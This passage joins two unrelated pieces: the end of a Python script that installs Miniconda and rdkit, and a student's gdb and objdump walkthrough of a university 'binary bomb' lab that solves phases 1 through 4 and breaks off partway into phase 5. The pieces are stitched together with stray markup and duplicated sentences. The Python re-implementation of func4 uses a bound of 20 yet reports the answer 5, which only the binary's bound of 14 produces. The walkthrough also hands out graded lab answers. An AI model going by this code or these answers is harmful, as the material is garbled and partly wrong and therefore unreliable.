res = requests.get(url, stream=True)
res.raise_for_status()
with open(file_name, 'wb') as f:
for chunk in res.iter_content(chunk_size):
f.write(chunk)
logger.info('done')
logger.info('installing miniconda to {}'.format(conda_path))
subprocess.check_call(["bash", file_name, "-b", "-p", conda_path])
logger.info('done')
logger.info("installing rdkit")
subprocess.check_call([
os.path.join(conda_path, "bin", "conda"),
"install",
"--yes",
"-c", "rdkit",
"python=={}".format(python_version),
"rdkit" if rdkit_version is None else "rdkit=={}".format(rdkit_version)])
logger.info("done")
import rdkit
logger.info("rdkit-{} installation finished!".format(rdkit.__version__))
if __name__ == "__main__":
    install()
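Once the cell finishes, a quick sanity check (my own example) confirms that the import works:
from rdkit import Chem
print(Chem.MolToSmiles(Chem.MolFromSmiles("c1ccccc1O")))  # prints phenol's canonical SMILES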
]]>Lab 2 for CSCI 2400 @ CU Boulder - Computer Systems
The nefarious Dr. Evil has planted a slew of “binary bombs” on our class machines. A binary bomb is a program that consists of a sequence of phases. Each phase expects you to type a particular string on stdin. If you type the correct string, then the phase is defused and the bomb proceeds to the next phase. Otherwise, the bomb explodes by printing "BOOM!!!" and then terminating. The bomb is defused when every phase has been defused.
There are too many bombs for us to deal with, so we are giving each student a bomb to defuse. Your mission, which you have no choice but to accept, is to defuse your bomb before the due date. Good luck, and welcome to the bomb squad! Bomb Lab Handout
I like using objdump to disassemble the code and get a broad overview of what is happening before I start.
objdump -d bomb > dis.txt
Note: I am not sure about the history of the bomb lab. I think it started at CMU.
joxxxn@jupyter-nxxh6xx8:~/lab2-bomblab-navanchauhan/bombbomb$ gdb -ex 'break phase_1' -ex 'break explode_bomb' -ex 'run' ./bomb
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./bomb...
Breakpoint 1 at 0x15c7
Breakpoint 2 at 0x1d4a
Starting program: /home/joxxxn/lab2-bomblab-navanchauhan/bombbomb/bomb
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
test string
Breakpoint 1, 0x00005555555555c7 in phase_1 ()
(gdb) dias phase_1
Undefined command: "dias". Try "help".
(gdb) disas phase_1
Dump of assembler code for function phase_1:
=> 0x00005555555555c7 <+0>: endbr64
0x00005555555555cb <+4>: sub $0x8,%rsp
0x00005555555555cf <+8>: lea 0x1b7a(%rip),%rsi # 0x555555557150
0x00005555555555d6 <+15>: call 0x555555555b31 <strings_not_equal>
0x00005555555555db <+20>: test %eax,%eax
0x00005555555555dd <+22>: jne 0x5555555555e4 <phase_1+29>
0x00005555555555df <+24>: add $0x8,%rsp
0x00005555555555e3 <+28>: ret
0x00005555555555e4 <+29>: call 0x555555555d4a <explode_bomb>
0x00005555555555e9 <+34>: jmp 0x5555555555df <phase_1+24>
End of assembler dump.
(gdb) print 0x555555557150
$1 = 93824992244048
(gdb) x/1s 0x555555557150
0x555555557150: "Controlling complexity is the essence of computer programming."
(gdb)
Phase 1 defused. How about the next one?
1 2 3 4 5 6
Breakpoint 1, 0x00005555555555eb in phase_2 ()
(gdb) disas
Dump of assembler code for function phase_2:
=> 0x00005555555555eb <+0>: endbr64
0x00005555555555ef <+4>: push %rbp
0x00005555555555f0 <+5>: push %rbx
0x00005555555555f1 <+6>: sub $0x28,%rsp
0x00005555555555f5 <+10>: mov %rsp,%rsi
0x00005555555555f8 <+13>: call 0x555555555d97 <read_six_numbers>
0x00005555555555fd <+18>: cmpl $0x0,(%rsp)
0x0000555555555601 <+22>: js 0x55555555560d <phase_2+34>
0x0000555555555603 <+24>: mov %rsp,%rbp
0x0000555555555606 <+27>: mov $0x1,%ebx
0x000055555555560b <+32>: jmp 0x555555555620 <phase_2+53>
0x000055555555560d <+34>: call 0x555555555d4a <explode_bomb>
0x0000555555555612 <+39>: jmp 0x555555555603 <phase_2+24>
0x0000555555555614 <+41>: add $0x1,%ebx
0x0000555555555617 <+44>: add $0x4,%rbp
0x000055555555561b <+48>: cmp $0x6,%ebx
0x000055555555561e <+51>: je 0x555555555631 <phase_2+70>
0x0000555555555620 <+53>: mov %ebx,%eax
0x0000555555555622 <+55>: add 0x0(%rbp),%eax
0x0000555555555625 <+58>: cmp %eax,0x4(%rbp)
0x0000555555555628 <+61>: je 0x555555555614 <phase_2+41>
0x000055555555562a <+63>: call 0x555555555d4a <explode_bomb>
0x000055555555562f <+68>: jmp 0x555555555614 <phase_2+41>
0x0000555555555631 <+70>: add $0x28,%rsp
0x0000555555555635 <+74>: pop %rbx
0x0000555555555636 <+75>: pop %rbp
0x0000555555555637 <+76>: ret
End of assembler dump.
(gdb)
0x00005555555555fd <+18>: cmpl $0x0,(%rsp)
0x0000555555555601 <+22>: js 0x55555555560d <phase_2+34>
...
0x000055555555560d <+34>: call 0x555555555d4a <explode_bomb>
The program first checks that the first number is not negative. The cmpl
instruction compares the first number with 0, setting the sign flag if the result is negative. The js
instruction stands for "jump if sign", causing a jump to the specified address if the sign bit is set. This would result in the explode_bomb function being called.
0x0000555555555603 <+24>: mov %rsp,%rbp
0x0000555555555606 <+27>: mov $0x1,%ebx
%rsp
in x86-64 asm, is the stack pointer i.e. it points to the top of the current stack frame. Since the program just read six numbers, the top of the stack (%rsp
) contains the address of the first number.
By executing mov %rsp,%rbp
we are setting the base pointer (%rbp
) to point to this address.
Now, for the second instruction mov $0x1,%ebx
, we are initialising the %ebx
register with the value 1. Based on the assembly code, you can see that this is being used as a counter/index for the loop.
0x000055555555560b <+32>: jmp 0x555555555620 <phase_2+53>
The program now jumps to
0x0000555555555620 <+53>: mov %ebx,%eax
0x0000555555555622 <+55>: add 0x0(%rbp),%eax
0x0000555555555625 <+58>: cmp %eax,0x4(%rbp)
0x0000555555555628 <+61>: je 0x555555555614 <phase_2+41>
Here, the value from %ebx
is copied to the %eax
register. For this iteration, the value should be 1.
Then, the value at the memory location pointed by %rbp
is added to the value in %eax
. For now, 0 is added (the first number that we read).
cmp %eax,0x4(%rbp)
- The instruction compares the value in %eax to the value at the memory address %rbp + 4
. Since integers here are stored using a word of memory (4 bytes), this checks %eax against the second number in the sequence.
je 0x555555555614 <phase_2+41>
- The program will jump to phase_2+41
if the previous cmp
instruction determined the values as equal.
0x0000555555555614 <+41>: add $0x1,%ebx
0x0000555555555617 <+44>: add $0x4,%rbp
0x000055555555561b <+48>: cmp $0x6,%ebx
0x000055555555561e <+51>: je 0x555555555631 <phase_2+70>
0x0000555555555620 <+53>: mov %ebx,%eax
0x0000555555555622 <+55>: add 0x0(%rbp),%eax
0x0000555555555625 <+58>: cmp %eax,0x4(%rbp)
0x0000555555555628 <+61>: je 0x555555555614 <phase_2+41>
Here, we can see that the program increments %ebx
by 1, adds a 4 byte offset to %rbp
(the number we will be matching now), and checks if %ebx
is equal to 6. If it is, it breaks the loop and jumps to <phase_2+70>
successfully finishing this stage.
Now, given that we know the first two numbers in the sequence are 0 1
, we can calculate the other numbers by following the pattern of adding the counter and the value of the previous number.
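As a quick sanity check, a few lines of Python can generate the rest of the sequence for us:
nums = [0]
for counter in range(1, 6):
    nums.append(nums[-1] + counter)  # next number = previous number + counter
print(*nums)  # 0 1 3 6 10 15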
Thus, the full input should be 0 1 3 6 10 15:
...
Phase 1 defused. How about the next one?
0 1 3 6 10 15
Breakpoint 1, 0x00005555555555eb in phase_2 ()
(gdb) continue
Continuing.
That's number 2. Keep going!
Let us look at the disassembled code first
0000000000001638 <phase_3>:
1638: f3 0f 1e fa endbr64
163c: 48 83 ec 18 sub $0x18,%rsp
1640: 48 8d 4c 24 07 lea 0x7(%rsp),%rcx
1645: 48 8d 54 24 0c lea 0xc(%rsp),%rdx
164a: 4c 8d 44 24 08 lea 0x8(%rsp),%r8
164f: 48 8d 35 60 1b 00 00 lea 0x1b60(%rip),%rsi # 31b6 <_IO_stdin_used+0x1b6>
1656: b8 00 00 00 00 mov $0x0,%eax
165b: e8 80 fc ff ff call 12e0 <__isoc99_sscanf@plt>
1660: 83 f8 02 cmp $0x2,%eax
1663: 7e 20 jle 1685 <phase_3+0x4d>
1665: 83 7c 24 0c 07 cmpl $0x7,0xc(%rsp)
166a: 0f 87 0d 01 00 00 ja 177d <phase_3+0x145>
1670: 8b 44 24 0c mov 0xc(%rsp),%eax
1674: 48 8d 15 55 1b 00 00 lea 0x1b55(%rip),%rdx # 31d0 <_IO_stdin_used+0x1d0>
167b: 48 63 04 82 movslq (%rdx,%rax,4),%rax
167f: 48 01 d0 add %rdx,%rax
1682: 3e ff e0 notrack jmp *%rax
1685: e8 c0 06 00 00 call 1d4a <explode_bomb>
168a: eb d9 jmp 1665 <phase_3+0x2d>
168c: b8 63 00 00 00 mov $0x63,%eax
1691: 81 7c 24 08 3d 02 00 cmpl $0x23d,0x8(%rsp)
1698: 00
1699: 0f 84 e8 00 00 00 je 1787 <phase_3+0x14f>
169f: e8 a6 06 00 00 call 1d4a <explode_bomb>
16a4: b8 63 00 00 00 mov $0x63,%eax
16a9: e9 d9 00 00 00 jmp 1787 <phase_3+0x14f>
16ae: b8 61 00 00 00 mov $0x61,%eax
16b3: 81 7c 24 08 27 01 00 cmpl $0x127,0x8(%rsp)
16ba: 00
16bb: 0f 84 c6 00 00 00 je 1787 <phase_3+0x14f>
16c1: e8 84 06 00 00 call 1d4a <explode_bomb>
16c6: b8 61 00 00 00 mov $0x61,%eax
16cb: e9 b7 00 00 00 jmp 1787 <phase_3+0x14f>
16d0: b8 78 00 00 00 mov $0x78,%eax
16d5: 81 7c 24 08 e7 02 00 cmpl $0x2e7,0x8(%rsp)
16dc: 00
16dd: 0f 84 a4 00 00 00 je 1787 <phase_3+0x14f>
16e3: e8 62 06 00 00 call 1d4a <explode_bomb>
16e8: b8 78 00 00 00 mov $0x78,%eax
16ed: e9 95 00 00 00 jmp 1787 <phase_3+0x14f>
16f2: b8 64 00 00 00 mov $0x64,%eax
16f7: 81 7c 24 08 80 02 00 cmpl $0x280,0x8(%rsp)
16fe: 00
16ff: 0f 84 82 00 00 00 je 1787 <phase_3+0x14f>
1705: e8 40 06 00 00 call 1d4a <explode_bomb>
170a: b8 64 00 00 00 mov $0x64,%eax
170f: eb 76 jmp 1787 <phase_3+0x14f>
1711: b8 6d 00 00 00 mov $0x6d,%eax
1716: 81 7c 24 08 ff 02 00 cmpl $0x2ff,0x8(%rsp)
171d: 00
171e: 74 67 je 1787 <phase_3+0x14f>
1720: e8 25 06 00 00 call 1d4a <explode_bomb>
1725: b8 6d 00 00 00 mov $0x6d,%eax
172a: eb 5b jmp 1787 <phase_3+0x14f>
172c: b8 71 00 00 00 mov $0x71,%eax
1731: 81 7c 24 08 75 03 00 cmpl $0x375,0x8(%rsp)
1738: 00
1739: 74 4c je 1787 <phase_3+0x14f>
173b: e8 0a 06 00 00 call 1d4a <explode_bomb>
1740: b8 71 00 00 00 mov $0x71,%eax
1745: eb 40 jmp 1787 <phase_3+0x14f>
1747: b8 79 00 00 00 mov $0x79,%eax
174c: 81 7c 24 08 94 02 00 cmpl $0x294,0x8(%rsp)
1753: 00
1754: 74 31 je 1787 <phase_3+0x14f>
1756: e8 ef 05 00 00 call 1d4a <explode_bomb>
175b: b8 79 00 00 00 mov $0x79,%eax
1760: eb 25 jmp 1787 <phase_3+0x14f>
1762: b8 79 00 00 00 mov $0x79,%eax
1767: 81 7c 24 08 88 02 00 cmpl $0x288,0x8(%rsp)
176e: 00
176f: 74 16 je 1787 <phase_3+0x14f>
1771: e8 d4 05 00 00 call 1d4a <explode_bomb>
1776: b8 79 00 00 00 mov $0x79,%eax
177b: eb 0a jmp 1787 <phase_3+0x14f>
177d: e8 c8 05 00 00 call 1d4a <explode_bomb>
1782: b8 68 00 00 00 mov $0x68,%eax
1787: 38 44 24 07 cmp %al,0x7(%rsp)
178b: 75 05 jne 1792 <phase_3+0x15a>
178d: 48 83 c4 18 add $0x18,%rsp
1791: c3 ret
1792: e8 b3 05 00 00 call 1d4a <explode_bomb>
1797: eb f4 jmp 178d <phase_3+0x155>
...
165b: e8 80 fc ff ff call 12e0 <__isoc99_sscanf@plt>
...
We can see that scanf
is being called which means we need to figure out what datatype(s) the program is expecting.
Because I do not want to enter the solutions to phases 1 and 2 again and again, I am going to pass a file which contains these solutions.
joxxxn@jupyter-nxxh6xx8:~/lab2-bomblab-navanchauhan/bombbomb$ gdb -ex 'break phase_3' -ex 'break explode_bomb' -ex 'run' -args ./bomb sol.txt
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./bomb...
Breakpoint 1 at 0x1638
Breakpoint 2 at 0x1d4a
Starting program: /home/joxxxn/lab2-bomblab-navanchauhan/bombbomb/bomb sol.txt
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Phase 1 defused. How about the next one?
That's number 2. Keep going!
random string
Breakpoint 1, 0x0000555555555638 in phase_3 ()
(gdb) disas
Dump of assembler code for function phase_3:
=> 0x0000555555555638 <+0>: endbr64
0x000055555555563c <+4>: sub $0x18,%rsp
0x0000555555555640 <+8>: lea 0x7(%rsp),%rcx
0x0000555555555645 <+13>: lea 0xc(%rsp),%rdx
0x000055555555564a <+18>: lea 0x8(%rsp),%r8
0x000055555555564f <+23>: lea 0x1b60(%rip),%rsi # 0x5555555571b6
0x0000555555555656 <+30>: mov $0x0,%eax
0x000055555555565b <+35>: call 0x5555555552e0 <__isoc99_sscanf@plt>
0x0000555555555660 <+40>: cmp $0x2,%eax
0x0000555555555663 <+43>: jle 0x555555555685 <phase_3+77>
0x0000555555555665 <+45>: cmpl $0x7,0xc(%rsp)
0x000055555555566a <+50>: ja 0x55555555577d <phase_3+325>
0x0000555555555670 <+56>: mov 0xc(%rsp),%eax
0x0000555555555674 <+60>: lea 0x1b55(%rip),%rdx # 0x5555555571d0
0x000055555555567b <+67>: movslq (%rdx,%rax,4),%rax
0x000055555555567f <+71>: add %rdx,%rax
0x0000555555555682 <+74>: notrack jmp *%rax
0x0000555555555685 <+77>: call 0x555555555d4a <explode_bomb>
0x000055555555568a <+82>: jmp 0x555555555665 <phase_3+45>
0x000055555555568c <+84>: mov $0x63,%eax
0x0000555555555691 <+89>: cmpl $0x23d,0x8(%rsp)
0x0000555555555699 <+97>: je 0x555555555787 <phase_3+335>
0x000055555555569f <+103>: call 0x555555555d4a <explode_bomb>
0x00005555555556a4 <+108>: mov $0x63,%eax
0x00005555555556a9 <+113>: jmp 0x555555555787 <phase_3+335>
--Type <RET> for more, q to quit, c to continue without paging--
gdb
has thankfully marked the address which is being passed to scanf
. We can access the value:
(gdb) x/1s 0x5555555571b6
0x5555555571b6: "%d %c %d"
(gdb)
BINGO! The program expects an integer, character, and another integer. Onwards.
0x0000555555555660 <+40>: cmp $0x2,%eax
0x0000555555555663 <+43>: jle 0x555555555685 <phase_3+77>
...
0x0000555555555685 <+77>: call 0x555555555d4a <explode_bomb>
The program checks whether scanf
returns a value <= 2, if it does then it calls the explode_bomb
function.
Note: scanf
returns the number of fields that were successfully converted and assigned
0x0000555555555665 <+45>: cmpl $0x7,0xc(%rsp)
0x000055555555566a <+50>: ja 0x55555555577d <phase_3+325>
...
0x000055555555577d <+325>: call 0x555555555d4a <explode_bomb>
Similarly, the program checks and ensures that the first number we entered is not greater than 7 (it is about to be used as an index).
0x0000555555555670 <+56>: mov 0xc(%rsp),%eax
0x0000555555555674 <+60>: lea 0x1b55(%rip),%rdx # 0x5555555571d0
0x000055555555567b <+67>: movslq (%rdx,%rax,4),%rax
0x000055555555567f <+71>: add %rdx,%rax
0x0000555555555682 <+74>: notrack jmp *%rax
0x0000555555555685 <+77>: call 0x555555555d4a <explode_bomb>
0x0000555555555670 <+56>: mov 0xc(%rsp),%eax
- Moves value located at 0xc
(12 in Decimal) bytes above the stack pointer to %eax
register.
0x0000555555555674 <+60>: lea 0x1b55(%rip),%rdx # 0x5555555571d0
- This instruction calculates an effective address by adding 0x1b55
to the current instruction pointer (%rip
). The result is stored in the %rdx
register.
0x000055555555567b <+67>: movslq (%rdx,%rax,4),%rax
movslq
stands for "move with sign-extension from a 32-bit value to a 64-bit value." (if the 32-bit value is negative, the 64-bit result will have all its upper 32 bits set to 1; otherwise, they'll be set to 0). (%rdx,%rax,4)
- First start with the value in the %rdx register, then add to it the value in the %rax register multiplied by 4.
%rax
- Destination register
0x000055555555567f <+71>: add %rdx,%rax
- Adds base address in %rdx
to the offset in %rax
0x0000555555555682 <+74>: notrack jmp *%rax
- Jumps to the address stored in %rax
0x0000555555555685 <+77>: call 0x555555555d4a <explode_bomb>
- This explode_bomb call is the target of the earlier jle check (too few fields read by scanf); execution only reaches it via that jump.
Let us try to run the program again with a valid input for the first number and see what the program is computing for the address.
I used the input: 3 c 123
.
To check what is the computed address, we can switch to the asm layout by running layout asm
, and then going through instructions ni
or si
until we reach the line movslq (%rdx,%rax,4),%rax
%rax
should hold the value 3.
(gdb) print $rax
$1 = 3
We can see that this makes us jump to <phase_3+186>
(Continue to step through the code by using ni
)
0x00005555555556f2 <+186>: mov $0x64,%eax
0x00005555555556f7 <+191>: cmpl $0x280,0x8(%rsp)
0x00005555555556ff <+199>: je 0x555555555787 <phase_3+335>
0x0000555555555705 <+205>: call 0x555555555d4a <explode_bomb>
We see that 0x64
(Decimal 100) is being stored in %eax
. Then, the program compares 0x280
(Decimal 640) with memory address 0x8
bytes above the stack pointer (%rsp
). If the values are equal, then it jumps to <phase_3+335>
, otherwise explode_bomb
is called.
0x0000555555555787 <+335>: cmp %al,0x7(%rsp)
0x000055555555578b <+339>: jne 0x555555555792 <phase_3+346>
0x000055555555578d <+341>: add $0x18,%rsp
0x0000555555555791 <+345>: ret
0x0000555555555792 <+346>: call 0x555555555d4a <explode_bomb>
Here, the program is comparing the value of our given character to the value stored in %al
(lower 8 bits of EAX
), and checks if they are not equal.
Knowing that the character is stored at an offset of 7 bytes to %rsp
, we can print and check the value by running:
(gdb) x/1cw $rsp+7
c
(gdb) print $al
$1 = 100
We can simply look up an ASCII table and see that 100 in decimal stands for the character d. Let us try this answer:
...
That's number 2. Keep going!
3 d 640
Breakpoint 1, 0x0000555555555638 in phase_3 ()
(gdb) continue
Continuing.
Halfway there!
joxxxn@jupyter-nxxh6xx8:~/lab2-bomblab-navanchauhan/bombbomb$ gdb -ex 'break phase_4' -ex 'break explode_bomb' -ex 'run' -args ./bomb sol.txt
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./bomb...
Breakpoint 1 at 0x17d3
Breakpoint 2 at 0x1d4a
Starting program: /home/joxxxn/lab2-bomblab-navanchauhan/bombbomb/bomb sol.txt
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Phase 1 defused. How about the next one?
That's number 2. Keep going!
Halfway there!
test string
Breakpoint 1, 0x00005555555557d3 in phase_4 ()
(gdb) disas phase_4
Dump of assembler code for function phase_4:
=> 0x00005555555557d3 <+0>: endbr64
0x00005555555557d7 <+4>: sub $0x18,%rsp
0x00005555555557db <+8>: lea 0x8(%rsp),%rcx
0x00005555555557e0 <+13>: lea 0xc(%rsp),%rdx
0x00005555555557e5 <+18>: lea 0x1bba(%rip),%rsi # 0x5555555573a6
0x00005555555557ec <+25>: mov $0x0,%eax
0x00005555555557f1 <+30>: call 0x5555555552e0 <__isoc99_sscanf@plt>
0x00005555555557f6 <+35>: cmp $0x2,%eax
0x00005555555557f9 <+38>: jne 0x555555555802 <phase_4+47>
0x00005555555557fb <+40>: cmpl $0xe,0xc(%rsp)
0x0000555555555800 <+45>: jbe 0x555555555807 <phase_4+52>
0x0000555555555802 <+47>: call 0x555555555d4a <explode_bomb>
0x0000555555555807 <+52>: mov $0xe,%edx
0x000055555555580c <+57>: mov $0x0,%esi
0x0000555555555811 <+62>: mov 0xc(%rsp),%edi
0x0000555555555815 <+66>: call 0x555555555799 <func4>
0x000055555555581a <+71>: cmp $0x2,%eax
0x000055555555581d <+74>: jne 0x555555555826 <phase_4+83>
0x000055555555581f <+76>: cmpl $0x2,0x8(%rsp)
0x0000555555555824 <+81>: je 0x55555555582b <phase_4+88>
0x0000555555555826 <+83>: call 0x555555555d4a <explode_bomb>
0x000055555555582b <+88>: add $0x18,%rsp
0x000055555555582f <+92>: ret
End of assembler dump.
(gdb)
Again, gdb
has marked the string being passed to scanf
(gdb) x/1s 0x5555555573a6
0x5555555573a6: "%d %d"
Okay, so this time we are supposed to enter 2 numbers.
0x00005555555557f6 <+35>: cmp $0x2,%eax
0x00005555555557f9 <+38>: jne 0x555555555802 <phase_4+47>
Checks if there were 2 values read from calling scanf
, if not -> jump to <phase_4+47>
which calls <explode_bomb>
.
0x00005555555557fb <+40>: cmpl $0xe,0xc(%rsp)
0x0000555555555800 <+45>: jbe 0x555555555807 <phase_4+52>
Compare 0xe
(14 in Decimal) and value stored at $rsp
+ 0xc
bytes (Decimal 12). If this condition is met (<= 14), jump to <phase_4+52>
. If not, then explode bomb.
...
0x0000555555555807 <+52>: mov $0xe,%edx
0x000055555555580c <+57>: mov $0x0,%esi
0x0000555555555811 <+62>: mov 0xc(%rsp),%edi
0x0000555555555815 <+66>: call 0x555555555799 <func4>
0x000055555555581a <+71>: cmp $0x2,%eax
0x000055555555581d <+74>: jne 0x555555555826 <phase_4+83>
0x000055555555581f <+76>: cmpl $0x2,0x8(%rsp)
0x0000555555555824 <+81>: je 0x55555555582b <phase_4+88>
0x0000555555555826 <+83>: call 0x555555555d4a <explode_bomb>
0x0000555555555815 <+66>: call 0x555555555799 <func4> calls another function, func4. After it returns, the value in %eax is compared with 0x2; if they are not equal, the program jumps to call <explode_bomb>. This tells us that func4 should return 2.
Let us look into func4:
(gdb) disas func4
Dump of assembler code for function func4:
0x0000555555555799 <+0>: endbr64
0x000055555555579d <+4>: sub $0x8,%rsp
0x00005555555557a1 <+8>: mov %edx,%ecx
0x00005555555557a3 <+10>: sub %esi,%ecx
0x00005555555557a5 <+12>: shr %ecx
0x00005555555557a7 <+14>: add %esi,%ecx
0x00005555555557a9 <+16>: cmp %edi,%ecx
0x00005555555557ab <+18>: ja 0x5555555557b9 <func4+32>
0x00005555555557ad <+20>: mov $0x0,%eax
0x00005555555557b2 <+25>: jb 0x5555555557c5 <func4+44>
0x00005555555557b4 <+27>: add $0x8,%rsp
0x00005555555557b8 <+31>: ret
0x00005555555557b9 <+32>: lea -0x1(%rcx),%edx
0x00005555555557bc <+35>: call 0x555555555799 <func4>
0x00005555555557c1 <+40>: add %eax,%eax
0x00005555555557c3 <+42>: jmp 0x5555555557b4 <func4+27>
0x00005555555557c5 <+44>: lea 0x1(%rcx),%esi
0x00005555555557c8 <+47>: call 0x555555555799 <func4>
0x00005555555557cd <+52>: lea 0x1(%rax,%rax,1),%eax
0x00005555555557d1 <+56>: jmp 0x5555555557b4 <func4+27>
This looks like a recursive function :( (I hate recursive functions)
Let's annotate the instructions.
endbr64
sub $0x8,%rsp // subtract 8 bytes from the stack pointer
mov %edx,%ecx // Move the value in register %edx to %ecx
sub %esi,%ecx // Subtract the value in %esi from %ecx
shr %ecx // Right shift the value in %ecx by one bit (dividing the value by 2)
add %esi,%ecx // Add the value in %esi to %ecx
cmp %edi,%ecx // Compare %ecx with %edi (our first input number)
ja 0x5555555557b9 <func4+32> // If %ecx > %edi -> jump to instruction at offset +32
mov $0x0,%eax // Move 0 to %eax
jb 0x5555555557c5 <func4+44> // If %ecx < %edi -> jump to instruction at offset +44.
add $0x8,%rsp // add 8 bytes to the stack pointer
ret // return
lea -0x1(%rcx),%edx // Load %rcx - 1 into %edx
call 0x555555555799 <func4> // Call itself
add %eax,%eax // Double the value in %eax
jmp 0x5555555557b4 <func4+27> // jump to the instruction at offset +27
lea 0x1(%rcx),%esi // Load %rcx + 1 into %esi
call 0x555555555799 <func4> // Call itself
lea 0x1(%rax,%rax,1),%eax // LEA of %rax * 2 + 1 into $eax
jmp 0x5555555557b4 <func4+27>
We can either try to compute the values by hand, or write a simple script in Python to get the answer.
def func4(edi, esi=0, edx=20):
ecx = (edx - esi) // 2 + esi
if ecx > edi:
return 2 * func4(edi, esi, ecx - 1)
elif ecx < edi:
return 2 * func4(edi, ecx + 1, edx) + 1
else:
return 0
for x in range(15): # We can limit to 14
if func4(x) == 2:
print(f"answer is {x}")
break
Running this code, we get: answer is 5
Okay, so we know that the number needed to be passed to func4
is 5. But, what about the second digit?
If we go back to the code for <phase_4>
, we can see that:
0x000055555555581f <+76>: cmpl $0x2,0x8(%rsp)
0x0000555555555824 <+81>: je 0x55555555582b <phase_4+88>
The value at $rsp+8
should be equal to 2. So, let us try passing 5 2
as our input.
...
Phase 1 defused. How about the next one?
That's number 2. Keep going!
Halfway there!
5 2
Breakpoint 1, 0x00005555555557d3 in phase_4 ()
(gdb) continue
Continuing.
So you got that one. Try this one.
So you got that one. Try this one.
test string
Breakpoint 1, 0x0000555555555830 in phase_5 ()
(gdb) disas phase_5
Dump of assembler code for function phase_5:
=> 0x0000555555555830 <+0>: endbr64
0x0000555555555834 <+4>: push %rbx
0x0000555555555835 <+5>: sub $0x10,%rsp
0x0000555555555839 <+9>: mov %rdi,%rbx
0x000055555555583c <+12>: call 0x555555555b10 <string_length>
0x0000555555555841 <+17>: cmp $0x6,%eax
0x0000555555555844 <+20>: jne 0x55555555588b <phase_5+91>
0x0000555555555846 <+22>: mov $0x0,%eax
0x000055555555584b <+27>: lea 0x199e(%rip),%rcx # 0x5555555571f0 <array.0>
0x0000555555555852 <+34>: movzbl (%rbx,%rax,1),%edx
0x0000555555555856 <+38>: and $0xf,%edx
0x0000555555555859 <+41>: movzbl (%rcx,%rdx,1),%edx
0x000055555555585d <+45>: mov %dl,0x9(%rsp,%rax,1)
0x0000555555555861 <+49>: add $0x1,%rax
0x0000555555555865 <+53>: cmp $0x6,%rax
0x0000555555555869 <+57>: jne 0x555555555852 <phase_5+34>
0x000055555555586b <+59>: movb $0x0,0xf(%rsp)
0x0000555555555870 <+64>: lea 0x9(%rsp),%rdi
0x0000555555555875 <+69>: lea 0x1943(%rip),%rsi # 0x5555555571bf
0x000055555555587c <+76>: call 0x555555555b31 <strings_not_equal>
0x0000555555555881 <+81>: test %eax,%eax
0x0000555555555883 <+83>: jne 0x555555555892 <phase_5+98>
0x0000555555555885 <+85>: add $0x10,%rsp
0x0000555555555889 <+89>: pop %rbx
0x000055555555588a <+90>: ret
0x000055555555588b <+91>: call 0x555555555d4a <explode_bomb>
0x0000555555555890 <+96>: jmp 0x555555555846 <phase_5+22>
0x0000555555555892 <+98>: call 0x555555555d4a <explode_bomb>
0x0000555555555897 <+103>: jmp 0x555555555885 <phase_5+85>
End of assembler dump.
(gdb)
...
0x000055555555583c <+12>: call 0x555555555b10 <string_length>
0x0000555555555841 <+17>: cmp $0x6,%eax
0x0000555555555844 <+20>: jne 0x55555555588b <phase_5+91>
...
0x000055555555588b <+91>: call 0x555555555d4a <explode_bomb>
...
First things first, these instructions check to make sure the passed string is of length 6, otherwise explode_bomb
is called.
We can also see a similar pattern compared to Phase 2, where we had a loop:
mov $0x0,%eax - Initialise %eax and set it to 0 (our counter/iterator)
movzbl (%rbx,%rax,1),%edx - Access %rbx + 1 * %rax and store it in %edx
and $0xf,%edx - Take the least significant 4 bits of the byte
movzbl (%rcx,%rdx,1),%edx - Use the 4 bits as an index into another array and load the corresponding byte into %edx
mov %dl,0x9(%rsp,%rax,1) - Store the transformed byte into a buffer on the stack
add $0x1,%rax - Increment %rax
cmp $0x6,%rax - If the index is not yet 6, loop again
movb $0x0,0xf(%rsp) - Null-terminate the transformed string
lea 0x9(%rsp),%rdi and lea 0x1943(%rip),%rsi - Load the transformed string and the reference string; the call to 0x555555555b31 <strings_not_equal> then checks if the two strings loaded up just before this are equal or not.
check if the two strings loaded up just before this are equal or not.We can check the reference string we need, which gdb
has marked as # 0x5555555571bf
, and the lookup table marked as # 0x5555555571f0 <array.0>
(gdb) x/s 0x5555555571bf
